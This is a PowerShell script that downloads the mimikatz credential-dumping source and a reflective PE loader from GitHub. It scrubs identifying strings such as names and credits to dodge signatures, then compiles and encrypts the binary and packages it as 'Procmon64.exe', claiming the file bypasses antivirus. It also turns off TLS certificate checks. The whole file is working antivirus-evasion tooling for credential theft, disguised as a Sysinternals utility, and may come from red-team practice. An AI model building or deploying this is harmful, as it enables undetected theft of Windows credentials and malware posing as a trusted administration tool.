#requires -version 2
<#

Author: Noah
@subTee's reflexive loader

Required Dependencies: msbuild, csc

Execute: Run-UpdateKatz -Verbose

This will download the latest mimikatz source and @subTee's reflexive PE loader, unzip, compile,
encrypt, and package the mimikatz binary into Procmon64.exe. The file itself will bypass AV.
Running is a different story.

Obviously run this from a clean machine, disable AV so you don't lose mimikatz
https://stackoverflow.com/questions/25506178/getting-msbuild-exe-without-installing-visual-studio

#>

$msbuild_path = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\amd64\MSBuild.exe"
$cscBuildPath = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csc.exe"
$utilName = "Procmon64.exe"

function Get-MimiAndKatz {
    [CmdletBinding()] Param()

    Write-Verbose "Downloading mimi katz and katz2.0..."
    
    $Domain = ""
    $User = ""
    $Password = ""
    
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    #$proxy = [Net.WebRequest]::GetSystemWebProxy()
    #$credCache = [Net.CredentialCache]::new()
    #$netCreds = [Net.NetworkCredential]::new("$User","$Password","$Domain")
    #$credCache.Add([Net.WebProxy]::GetDefaultProxy().Address, "Basic", $netCreds)
    #$proxy.Credentials = $credCache

    $webClient = New-Object System.NET.WebClient
    #$webClient.Proxy = $proxy
    $webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3578.108 Safari/537.36")
    $mimiURL = "https://github.com/gentilkiwi/mimikatz/archive/master.zip"
    $destMimi = (Get-Location).Path + "\mimikatz-master.zip"

    $webClient.DownloadFile($mimiURL, $destMimi)

    $katzURL = "https://raw.githubusercontent.com/thesubtlety/Utils/master/katz2.0.cs"
    $destKatz = (Get-Location).Path + "\katz2.0.cs"
    $webClient.DownloadFile($katzURL, $destKatz)

    Write-Verbose "Saving to `n`t$destKatz `n`t$destMimi"

    Unzip $destMimi ($destMimi -replace ".zip")
}

# Required for posh <v5
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip {
    param([string]$zipfile, [string]$outpath)
    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

function PrepareBuild-Mimi{
    [CmdletBinding()] Param()

    Write-Verbose "Renaming things..."

    $mimipath = (get-location).path + "\mimikatz-master\mimikatz-master"
    $allfiles = Get-ChildItem $mimipath -recurse | Where-Object { $_.Attributes -notmatch 'directory' } | `
                                                   Where-Object { $_.Extension -match '\.c|\.cs|\.cmd|\.def|\.filters|\.h|\.idl|\.rc|\.sln|\.tlog|\.vcxproj|\.yar'  }

   foreach ($file in $allfiles) {
        (Get-Content $file.PSPath) | `
        ForEach-Object { $_ -replace "mimikatz", "mimidogz" `
                            -replace "kiwi", "fruity" `
                            -replace "delpy", "french" `
                            -replace "gentilkiwi", "gentle" `
                            -replace "Build with love", "" `
                            -replace "vincent", "vinny" `
                            } | `
        Set-Content $file.PSPath
    }
    #Get-ChildItem -recurse $mimipath |  Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }
    Get-ChildItem -recurse $mimipath | Where-Object { $_.name -match "mimikatz" } | Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }

    Write-Verbose "Building mimikatz..."
    iex "cmd /c `"$msbuild_path`" `"$mimipath\mimidogz.sln`" /t:Build /p:Configuration=Release /p:Platform=x64 "
}

function Build-Katz($katzPath) {

    Write-Verbose "Building Katz2.0..."

    IEX "cmd /c `"$cscBuildPath`" /t:exe /out:$utilName /unsafe $katzPath"
    #$c = '"$cscBuildPath" "/t:exe /out:$utilName /unsafe $katzPath"'
    #iex "& $c"
}

function PrepareBuild-Katz {
    
    Write-Verbose "Fixing up defaults..."

    $katzPath = (Get-Location).Path + "\katz2.0.cs"
    (Get-Content $katzPath) -replace "`"password`"", "`"WaitForSingleObject`"" | Set-Content $katzPath

    Build-Katz($katzPath)
}

function Encrypt-Mimi {
    [CmdletBinding()] Param()

    Write-Verbose "Encrypting mimikatz with katz2..."

    $katzPath = (Get-Location).Path + "\katz2.0.cs"
    $mimiexePath = (Get-Location).path + "\mimikatz-master\mimikatz-master\x64\mimidogz.exe"
    $out = IEX "cmd /c .\$utilName encrypt $mimiexePath"

    (Get-Content $katzPath) -replace "INSERT B64 HERE", $out | Set-Content $katzPath
    Build-Katz($katzPath)

    Write-Verbose "Done... Run $utilname..."
}

function Run-UpdateKatz {
    [CmdletBinding()] Param()

    Get-MimiAndKatz
    PrepareBuild-Mimi
    PrepareBuild-Katz
    Encrypt-Mimi
}